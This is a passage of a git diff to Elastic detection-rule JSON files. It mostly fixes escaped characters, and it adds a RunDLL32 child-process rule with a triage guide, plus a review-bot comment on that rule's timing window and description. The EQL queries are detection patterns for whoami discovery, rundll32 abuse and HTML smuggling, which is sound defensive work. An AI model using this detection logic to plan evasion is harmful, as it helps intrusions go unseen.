user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", 
@@ -78,7 +78,7 @@
 ],
 "risk_score": 21,
 "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -91,7 +91,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json
index c03c7fbb33c..6eee0fdae56 100644
--- a/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json
index ed2c27d8324..179638e62b7 100644
--- a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_103.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json
index 8e37c1b3fcb..d292b279592 100644
--- a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_104.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json
index ac4aa35fca0..258c39e5fd9 100644
--- a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_105.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_106.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_106.json
new file mode 100644
index 00000000000..4718373d16f
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_106.json
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity.", + "from": "now-60m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "30m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Processes of RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Processes of RunDLL32\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nRunDLL32 is a legitimate Windows utility used to load and execute functions within dynamic-link libraries (DLLs). However, adversaries may abuse RunDLL32 to execute malicious code, bypassing security measures and evading detection. This rule identifies potential abuse by looking for an unusual process creation with no arguments followed by the creation of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE 
'%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related Rules\n\n- Unusual Network Connection via RunDLL32 - 52aaab7b-b51c-441a-89ce-4387b3aea886\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1h\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "f036953a-4615-4707-a1ca-dc53bf69dcd5_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json index b70e70b1f4f..208923bb53f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_102.json 
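Review bot: The sequence's `maxspan=1h` is as long as the rule's look-back window (`"from": "now-60m"`) while the rule runs every `"interval": "30m"`, so a child that spawns late in the span can fall into a run whose window no longer contains the parent `rundll32.exe` start event; if the engine only pairs events that lie inside the queried window (my reading of these three fields, to be confirmed against the engine's semantics), the look-back should exceed `maxspan` plus `interval`, e.g. `"from": "now-100m"` (constructed example). The `description` also says the rule flags child processes "where the command line parameters were suspicious", but the query matches `process.args_count == 1`, i.e. rundll32 started with no arguments at all, which is what the `note` correctly describes; the description should be aligned with the query. Finally, `index` lists `winlogbeat-*` and `logs-windows.*` yet the file has no `setup` key, whereas other rules in this changeset (`ef862985-3f13-4262-a686-5f357bbb9bc2`, `f0493cb4-9b15-43a9-9359-68c23a7f2cf3`) carry a `setup` string explaining that on non-agent indices such as beats `event.ingested` must be populated for versions <8.2; the same text would fit here so operators on beats data know the sequence will not fire without that pipeline.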
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Suspicious HTML File Creation", "note": "", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where 
host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json
index a77843ecab8..0fb42e21f7a 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_103.json
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Suspicious HTML File Creation", "note": "", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where 
host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json
index 3e8ace04db7..4b5baf7b3c1 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_104.json
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Suspicious HTML File Creation", "note": "", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where 
host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json
index 869e9d00cd3..76f79428db5 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_105.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious HTML File Creation", - "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy \u003e= 5 and file.size \u003e= 150000) or file.size \u003e= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process 
